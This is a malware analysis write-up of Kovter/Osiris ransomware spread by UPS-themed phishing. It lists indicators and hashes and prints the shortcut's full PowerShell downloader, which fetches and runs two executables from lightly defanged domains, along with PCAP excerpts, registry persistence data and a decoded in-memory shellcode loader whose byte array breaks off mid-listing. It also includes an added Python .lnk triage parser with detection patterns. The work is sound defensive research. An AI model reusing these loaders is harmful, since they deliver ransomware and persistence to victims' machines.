2017-02-06 Kovter/Osiris UPS Malspam

A little late for this write-up, but here is an example of some Kovter/Osiris malspam that I was able to find from late last week. While researching some of the URLs below I came across My Online Security's blog post, which also listed the domains below. It looks as if they have been keeping tabs on these types of emails and the callbacks used as well.

All artifacts from this investigation can be found in the GitHub repo located here.

The attack is a simple one: phishing emails are sent to users suggesting that the person has a UPS shipment that has been shipped, or not delivered, which then prompts them to act. The attachment is a zip file that, once unzipped, is really an LNK file made to look like a Word document. The attack relies on the OS hiding the LNK extension, so only the DOC extension is shown. The shortcut's target field also contains some PowerShell code, as seen in the image below. Microsoft has an article talking about this attack vector which can be found here, and an updated article talking about the Kovter infection here. All of this ends with the system being encrypted with Osiris.


*Indicators of Compromise:*
50[.]62[.]238[.]1 / helpdeskng[.]com
194[.]31[.]59[.]5
128[.]1[.]191[.]207
104[.]247[.]149[.]240
48[.]176[.]164[.]247 (Port 8080)
28[.]194[.]116[.]44 (Port 8080)
193[.]75[.]133[.]172 (Port 8080)
77[.]44[.]38[.]70 (Port 8080)
60[.]193[.]66[.]163 (Port 8080)
72[.]64[.]109[.]208 (Port 8080)
14[.]47[.]201[.]123 (Port 8080)
74[.]220[.]211[.]62
189[.]177[.]220[.]156
38[.]123[.]253[.]210 (HTTPS)
128[.]1[.]191[.]207
38[.]123[.]253[.]210
40[.]135[.]7[.]195 (Port 8080)
40[.]213[.]139[.]241 (Port 8080)
131[.]168[.]180[.]20 (Port 8080)
39[.]205[.]100[.]112 (Port 8080)
97[.]167[.]78[.]47 (Port 8080)
21[.]69[.]102[.]34 (Port 8080)
28[.]246[.]201[.]182 (Port 8080)
169[.]6[.]96[.]39 (Port 8080)
83[.]102[.]201[.]113 (Port 8080)
143[.]152[.]100[.]215 (Port 8080)

*Artifacts:*
File name: a1.exe
File size: 380KB
MD5 hash: fbe08cc20207d5c4f61757484568b9b0
Virustotal: http://www.virustotal.com/en/file/bd9a3d09c31a034a9434a5f182624b70e418ed4421ee991069d3b47a156bd6ba/analysis/
First submitted: 2017-02-03 00:46:14 UTC
Detection ratio: 18 / 56

File name: a2.exe
File size: 340KB
MD5 hash: f503802c3399f2f58c9a9fdeaffdd1f6
Virustotal: NA

File name: c3046d01.e5782001b
File size: 6KB
MD5 hash: 85445dde7246db5feef9f853c7aa05e1
Virustotal: NA

File name: e7da1628.bat
File size: 77B
MD5 hash: 65ab194835a57961575c64996f91e8c3
Virustotal: NA

*Analysis of malware:*
Starting from the system perspective, executing the malicious LNK file runs the following PowerShell code:

"C:\Windows\System32\WindowsPowerShell\v1[.]0\powershell[.]exe" -ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';function g($f){Start $f;};function z{return New-Object System[.]Net[.]WebClient;};$ld=0;$cs=[char]92;$fn=$env:temp+$cs;$dc=$fn+'a[.]doc';$c='';$q=New-Object System[.]Random;if(!(Test-Path $dc)){for($i=0;$i -lt 2000;$i++){$c=$c+[char]$q[.]Next(1,255);};$c | Out-File -FilePath $dc;};g($dc);$lk=$fn+'a[.]txt';$y=z;if(!(Test-Path $lk)){New-Item -Path $fn -Name 'a[.]txt' -ItemType File;for($n=1;$n -le 2;$n++){$f=$fn+'a'+$n+'[.]exe';$r='/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n;for($i=$ld;$i -lt $ll[.]length;$i++){$u=$ll[$i]+$r;$u='http://'+$u;$y[.]DownloadFile($u,$f);if(Test-Path $f){$v=Get-Item $f;if($v[.]length -gt 10000){$ld=$i;g($f);break;};};};};};notepad[.]exe

This code is what downloads the two files "a1.exe" and "a2.exe": it requests the URI "'/counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b'+$n" inside a loop over $n, and "$f=$fn+'a'+$n+'.exe';" gives the files their names once downloaded. This can also be seen in the PCAP:
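A defender's counterpart to the above, as an added example that is not part of the original write-up: a small Python parser for the shell-link (.lnk) format that pulls the target, arguments and icon path out of the attachment without running it, then flags the traits this sample shows (a script host as the target, ExecutionPolicy bypass, WebClient downloads, a minimised window, an Office icon). The header layout and flag bits come from the published MS-SHLLINK specification; the sample .lnk, its Office icon path and the abbreviated argument string are constructed here for the test and are not the real attachment.

```python
import re
import struct

# Shell link header constants (MS-SHLLINK section 2.1). The offsets and flag bits are
# from the published format; everything else in this file is constructed for the example.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised

STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Argument patterns worth flagging when a shortcut launches a script host.
ARG_INDICATORS = {
    "executionpolicy-bypass": r"-ex\w*\s+bypass",
    "noprofile": r"-nop\w*\b",
    "hidden-window": r"-w\w*\s+hidden",
    "encoded-command": r"-e(?:c|nc|ncodedcommand)\b",
    "webclient-download": r"webclient|download(?:file|string|data)",
    "base64-decode": r"frombase64string",
    "invoke-expression": r"\biex\b|invoke-expression",
}
SCRIPT_HOSTS = ("powershell", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")


def parse_lnk(data: bytes) -> dict:
    """Parse the header and StringData of a .lnk file; the IDList and LinkInfo are skipped."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("not a shell link file")
    if struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_TARGET_IDLIST:          # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:              # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:        # each: CountCharacters + characters, no terminator
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


def triage_lnk(data: bytes) -> dict:
    """Parsed fields plus a list of findings for analyst review."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    target = (info.get("relative_path", "") + " " + args).lower()
    findings = [f"script-host-target:{h}" for h in SCRIPT_HOSTS if h in target]
    findings += [name for name, pat in ARG_INDICATORS.items() if re.search(pat, args, re.I)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("starts-minimised")
    if re.search(r"winword|excel|wordpad", info.get("icon_location", ""), re.I):
        findings.append("office-icon-disguise")
    # Quoted literals hand the analyst the domains and paths without executing anything.
    info["string_literals"] = re.findall(r"'([^']+)'", args)
    info["findings"] = findings
    return info


def build_lnk(relative_path: str, arguments: str, icon_location: str, show_command: int) -> bytes:
    """Assemble a minimal Unicode .lnk (constructed test input, not a real sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


# Constructed sample: an abbreviated stand-in for the downloader command line quoted above.
SAMPLE_ARGS = ("-ExecutionPolicy ByPass -NoProfile -command $ll='helpdeskng[.]com','custommaidbooks[.]com';"
               "$y=New-Object System.Net.WebClient;$y.DownloadFile('http://'+$ll[0]+'/counter/?id=1',"
               "$env:temp+'\\a1.exe');")
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       SAMPLE_ARGS, r"%ProgramFiles%\Microsoft Office\Office14\WINWORD.EXE",
                       SW_SHOWMINNOACTIVE)


def triage_sample() -> dict:
    return triage_lnk(SAMPLE_LNK)


if __name__ == "__main__":
    result = triage_sample()
    print("target arguments:", result["arguments"][:80], "...")
    print("findings:", ", ".join(result["findings"]))
    print("string literals:", result["string_literals"])
```

Pointing `triage_lnk` at the bytes of the real attachment is enough to see the full command line and the download domains before anything is detonated; the findings list is meant to be read by an analyst, not treated as a verdict on its own.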

GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b1 HTTP/1.1
Host: helpdeskng[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:35 GMT
Server: Apache
Content-Disposition: attachment; filename=f5.png
Content-Length: 379904
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:35 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

-----

GET /counter/?TW0E85PQgTiPBFTiDNd5Qdm_ZYiIJMt9_er3rI1oXapZ5_kep0SNzG3vZwOACi5sTTwpdsm9GeWlN4o_BinoVm13yx3b2 HTTP/1.1
Host: helpdeskng[.]com

HTTP/1.1 200 OK
Date: Fri, 03 Feb 2017 08:49:36 GMT
Server: Apache
Content-Disposition: attachment; filename=868d.png
Content-Length: 339777
Cache-Control: max-age=5184000
Expires: Tue, 04 Apr 2017 08:49:36 GMT
Content-Type: image/png

MZ......................@.............................................	.!..L.!This program cannot be run in DOS mode.

During this time Word is opened up as well (the script writes 2000 random characters to %TEMP%\a.doc and starts it), but there does not seem to be anything malicious about it from what I can see.

Once these files have been downloaded to the system, "a1.exe" is executed first and starts looking at different registry keys and file locations on the system; shortly thereafter the "a2.exe" process is started and proceeds to look at different things within the registry and the file system while setting registry values. For example:

Path: HKCU\Software\7GWsaAe\GsDyqtU6qn
Type:	REG_SZ
Length:	892,566
Data:	¿ËÍIBœþ†‚‘Ï«Öo‡©¸uŸ·PX¬¡1z#B2|C¤%ܳ$¼_Îd·›áþ׸?¶­ þÁ£M|Þ|l˜™'ŒEÒ÷âÀaçrPhFc¶Ušes³U‹YÌLAp¼@Œw>PUpVæÿ3é¿QÑ9-2JÁ9¨7ßšõW{Yøå4sÜ×è,›ÍЧÎU”LŸåÔC¼fwÚáQ¡þŠÍ«®3™†ËL

-----

Path: HKCU\Software\7GWsaAe\xBQlLx
Type:	REG_SZ
Length:	106,344
Data:	aZTXBoMIgZLfYPVj5NGKkBK="nYs38HRYT745axjeErGZ1";hrAOzPmKYqnW2QUxKmF="VCl6jqYtdcCslBoDb";vJVb1JPhBOyMqrWmJRBx="DCRdConVe2Huod7tA2jpIUxuXkbVFnXQBoYfdWXgoVQy";Fd…

-----

Path: HKLM\SOFTWARE\Wow6432Node\lqoiarkklq\lapxjqc
Type:	REG_SZ
Length:	910,252
Data:	$1W=ÅåŸû>Å@ÐöB8½ƒ¯¯ØehÂp9Ñ:çîËçý„Ž]:ÜÜh

-----

Path: HKCU\Software\lqoiarkklq\txpge
Type:	REG_SZ
Length:	104,872
Data:	JZroJd2gxMbrSBTJpvmp="CfcD7gwy0RQtl396CbCG9ydLoE";YFzuPrDl1WIVPNuoFtEFHuBL="sVAFCJ4pbaOR0g9zsiLtZ4JFnIrTZ4HPXIfB99Oll";KZcwv8urWPpecoi2MAAU="HOWjlqH30Ja5Hy5S6djKoTme43AMVgwQOh4bn82RI3tEP9Q";dISBmzqXpuqXEiT0Yx="vB6EXz5fPclmVDTCwBRTYyglpTHZNSns88saBbp4H";O4oUMKfohXdbFHOHluMs7v="NiKtr4ds0JP7rDokSjaYH32SKl1ud8a02J";nRvfucl0mnbmtVCoYKkLaCv="KsfhOr8tfAOhUEjDdI8Pv75noMhmbMSBTITAIyGbnze";WWzxToRttSpb7OJXj7FhRf="Nbd8efU5ArtYWp4ulpRDrGUJzinSWVVz096QrMT4mWLwL";PLyiIuCPJovOeDLujY4LeMe="e5te7kFWHrvPAWF0dVNqNmTBcY1YPzRJvlxNsoz7hA3AaJ";VEc1="317B3C38735B2E2F013565301C12094B0E231B39270A7B0F0F061E1F742F1176652349571D1E553662612C7E7E392C3703060218300F66533F3A101D006045693130203039173106491D14357505117D3D204F183E1D6E5B3B1338303207015A0622074E102A10271E297B2B70755B1C3952503127051C2531703D2439091C1E2C212713196006715A3E201425101C3114333B150B3A15130C383C210E001D13762928240230651014132C7A675920280A4C34231036051F1960637E0065570855474D4C2831322F362621017A7B69527D4101073B7F45212C2647131620130110193D371B0139056D571E621B065C181E4B0011320l

At this time I cannot be certain what the purpose of each of these files is, or whether their purposes are completely different or overlap. The only thing that is apparent to me at this time is that the a1.exe process is the main process that encrypts the files on the system, whereas the a2.exe process does not handle the encryption and seems to be handling the persistence part of this infection.

The PowerShell script also kicks off two other processes (both regsvr32.exe), which are used to create persistence on the now-infected system via registry keys and the file system, and also to keep an open connection to the C2 systems.

The interesting thing about one of these regsvr32.exe processes (PID 612) is that the following base64-encoded block of code is passed to it when the process is started from its parent:

APPDATA=C:\Users\Administrator\AppData\Roaming
	aykqh=iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('<base64 blob omitted in this copy>')))

Decoding the base64 gives the following script (the long comma-separated block assigned to $sc32 is a byte array, declared as [Byte[]]):

#avobmsjvucjuocxunkajuvogibdcmkeqp
sleep(15);try{
#wqdyo
function gdelegate{
#fdfffepqoo
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#gktfrbj
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#nwbkci
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#thlr
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#cxywzfl
return $TypeBuilder.CreateType();}
#alkfpyijql
function gproc{
#mkleldsfcl
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#bpnie
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
#vdznigk
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#jutvbiw
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#icebofnc
[Byte[]] $sc32 = 0x55,<#rpr#>0x8B,0xEC,<#ji#>0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,<#atw#>0x52,0x30,0x8B,0x52,<#bep#>0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,0xFF,0x31,0xC0,<#ccd#>0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,<#ro#>0x5D,0xFC,<#sc#>0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,<#cw#>0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#lpj#>0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0xE5,0x01,0x00,0x00,0x8B,0x45,0xD0,<#qkq#>0x8B,0x40,0x78,0x03,0x45,0xFC,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,<#at#>0x8C,0xCB,0x01,0x00,0x00,0x40,0x89,0x85,<#nxg#>0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,<#lcb#>0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0x4D,0xFC,0x81,0x39,0x4C,0x6F,0x61,0x64,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x4C,<#olr#>0x69,0x62,0x72,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,0x61,0x72,0x79,0x41,<#na#>0x75,0x40,0x8D,0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,<#xtg#>0x8B,0x00,0x8B,0x55,0xCC,<#ige#>0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xBC,<#usr#>0x81,0x39,0x47,0x65,0x74,0x50,<#nfz#>0x75,0x56,0x8D,0x41,0x04,0x81,0x38,<#cp#>0x72,0x6F,0x63,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,0x38,<#jo#>0x64,0x64,0x72,0x65,0x75,0x40,0x8D,0x41,0x0E,0x80,0x38,0x00,<#sbs#>0x75,0x38,0x8B,<#ac#>0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,<#dd#>0x52,0x50,0x8B,0xC6,0x03,0xC0,
0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,<#vue#>0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,<#lx#>0x02,0x03,<#pha#>0xD0,0x8B,<#st#>0x02,0x03,0x45,0xFC,0x89,0x45,0xB8,<#oai#>0x81,0x39,0x56,0x69,0x72,0x74,0x75,0x56,0x8D,0x41,0x04,0x81,0x38,0x75,0x61,0x6C,0x41,0x75,0x4B,0x8D,0x41,0x08,0x81,<#ums#>0x38,<#vzz#>0x6C,0x6C,0x6F,0x63,0x75,0x40,0x8D,<#uu#>0x41,0x0C,0x80,0x38,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,<#jpx#>0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,<#sxs#>0xA8,0x81,0x39,<#kdk#>0x45,0x78,0x69,0x74,0x75,0x63,0x8D,0x41,0x04,<#iwj#>0x81,<#wny#>0x38,0x50,0x72,0x6F,0x63,0x75,0x58,0x8D,<#mpl#>0x41,0x08,0x80,0x38,0x65,0x75,0x50,0x8D,0x41,0x09,0x80,0x38,0x73,0x75,0x48,0x8D,0x41,0x0A,0x80,0x38,0x73,0x75,0x40,0x83,0xC1,0x0B,<#eo#>0x80,0x39,0x00,0x75,0x38,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,0xC6,<#xzx#>0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#bx#>0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0x55,<#mey#>0xFC,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,<#ebh#>0x03,0xD0,<#qyl#>0x8B,0x02,0x03,0x45,0xFC,0x89,0x45,0xA4,0x46,0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,<#dni#>0x0F,0x85,0x3E,0xFE,0xFF,0xFF,<#qn#>0xC6,0x85,0x2F,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x30,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x31,0xFF,0xFF,0xFF,0x76,0xC6,0x85,0x32,0xFF,0xFF,0xFF,0x61,0xC6,0x85,0x33,0xFF,0xFF,0xFF,0x70,0xC6,0x85,0x34,0xFF,0xFF,0xFF,0x69,0xC6,0x85,0x35,0xFF,0xFF,0xFF,0x33,0xC6,0x85,<#mzf#>0x36,0xFF,0xFF,0xFF,0x32,<#ld#>0xC6,0x85,0x37,0xFF,0xFF,0xFF,0x2E,0xC6,0x85,0x38,0xFF,0xFF,0xFF,0x64,0xC6,0x85,0x39,0xFF,0xFF,0xFF,0x6C,0xC6,0x85,0x3A,0xFF,<#lbr#>0xFF,0xFF,0x6C,<#pu#>0xC6,0x85,0x3B,0xFF,0xFF,0xFF,0x00,0x8D,0x85,0x2F,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xBC,0x8B,0xD8,0x85,0xDB,0x75,0x05,0x6A,0x00,0xFF,0x55,0xA4,0
x89,0x5D,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x4F,0x01,0x00,0x00,0x8B,0xC3,0x33,0xD2,0x52,0x50,0x8B,0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x89,0x45,0xD0,0x8B,0x45,0xD0,0x81,0x38,0x50,0x45,0x00,0x00,0x0F,0x85,0x26,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8B,0x40,0x78,0x03,0xC3,0x89,0x45,0xCC,0x8B,0x45,0xCC,0x8B,0x40,0x18,0x85,0xC0,0x0F,0x8C,0x0D,0x01,0x00,0x00,0x40,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0x33,0xF6,0x8B,0xC3,<#th#>0x33,0xD2,0x52,0x50,0x8B,0x45,0xCC,0x8B,0x40,0x20,<#ksk#>0x33,0xD2,0x52,0x50,0x8B,0xC6,0xC1,0xE0,0x02,0x99,0x03,0x04,0x24,0x13,0x54,0x24,<#uaz#>0x04,0x83,0xC4,0x08,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x8B,0x08,0x03,0xCB,0x81,0x39,0x52,0x65,0x67,0x4F,0x75,0x5B,0x8D,0x41,0x04,0x81,0x38,0x70,0x65,0x6E,0x4B,0x75,0x50,0x8D,0x41,0x08,0x81,0x38,0x65,0x79,0x45,0x78,0x75,0x45,0x8D,0x41,0x0C,0x80,0x38,0x41,0x75,0x3D,0x8D,0x41,0x0D,0x80,0x38,0x00,0x75,0x35,<#tx#>0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,0xC3,0x89,0x45,0xB0,0x81,0x39,0x52,0x65,0x67,0x51,0x75,0x5E,0x8D,<#niu#>0x41,0x04,0x81,0x38,<#jk#>0x75,0x65,0x72,<#lq#>0x79,0x75,0x53,0x8D,0x41,0x08,0x81,0x38,0x56,0x61,0x6C,0x75,0x75,0x48,0x8D,0x41,0x0C,0x81,0x38,0x65,0x45,0x78,0x41,0x75,0x3D,0x83,0xC1,<#yqf#>0x10,0x80,0x39,0x00,0x75,<#tn#>0x35,0x8B,0x45,0xCC,0x8B,0x40,0x24,0x03,0xC3,0x33,0xD2,0x52,0x50,0x8B,0xC6,0x03,0xC0,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0x83,0xC4,0x08,0x66,0x8B,0x00,0x8B,0x55,0xCC,0x8B,0x52,0x1C,0x03,0xD3,0x0F,0xB7,0xC0,0xC1,<#wtn#>0xE0,0x02,0x03,0xD0,0x8B,0x02,0x03,<#vt#>0xC3,0x89,<#hne#>0x45,0xAC,0x46,<#men#>0xFF,0x8D,0x3C,0xFF,0xFF,0xFF,0x0F,0x85,0xFC,<#ckz#>0xFE,0xFF,0xFF,0x8B,0x45,0x08,0x05,0x48,0x0A,0x00,0x00,0x89,0x85,0x7C,0xFF,0xFF,0xFF,<#ikq#>0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x05,0xE4,0x00,0x00,<#qev#>0x00,0x89,<#xsb
#>0x85,0x78,0xFF,0xFF,0xFF,0x33,0xDB,0x33,0xC0,0x89,0x85,0x64,<#ao#>0xFF,0xFF,0xFF,0x33,0xC0,0x89,0x85,0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x02,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x8D,0x85,0x60,0xFF,<#oz#>0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,<#xde#>0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,<#chq#>0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x8B,0x85,<#bu#>0x64,0xFF,0xFF,0xFF,0x50,0x8D,0x85,0x6C,<#kf#>0xFF,<#yac#>0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,<#yl#>0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,<#mx#>0xFF,0xFF,0xFF,0x50,0xFF,0x55,0xAC,0x85,0xC0,0x75,0x02,0xB3,0x01,0x33,0xC0,0x89,0x85,<#hn#>0x70,0xFF,0xFF,0xFF,0x84,0xDB,0x0F,<#ds#>0x85,0xB8,0x00,0x00,0x00,0x33,0xC0,0x89,0x85,<#uu#>0x64,0xFF,0xFF,0xFF,<#xo#>0x33,0xC0,0x89,0x85,<#mnf#>0x60,0xFF,0xFF,0xFF,0x8D,0x85,0x70,0xFF,0xFF,0xFF,<#gdg#>0x50,0x6A,0x01,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x50,0x68,0x01,0x00,0x00,0x80,0xFF,0x55,0xB0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,<#gwq#>0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x6A,0x00,0x8B,0x85,0x7C,0xFF,0xFF,0xFF,0x83,0xC0,0x41,0x50,0x8B,0x85,0x70,0xFF,0xFF,0xFF,0x50,0xFF,<#nrl#>0x55,0xAC,0x85,<#as#>0xC0,0x75,0x5C,0x83,0xBD,0x60,0xFF,0xFF,0xFF,0x64,0x76,0x53,0x6A,0x40,0x68,0x00,0x30,0x00,0x00,0x8B,0x85,0x60,<#qr#>0xFF,0xFF,0xFF,0x50,0x6A,0x00,0xFF,0x55,0xA8,0x89,0x85,<#fzq#>0x64,0xFF,0xFF,0xFF,0x83,0xBD,0x64,0xFF,0xFF,0xFF,0x00,0x74,0x31,0x8D,0x85,0x60,0xFF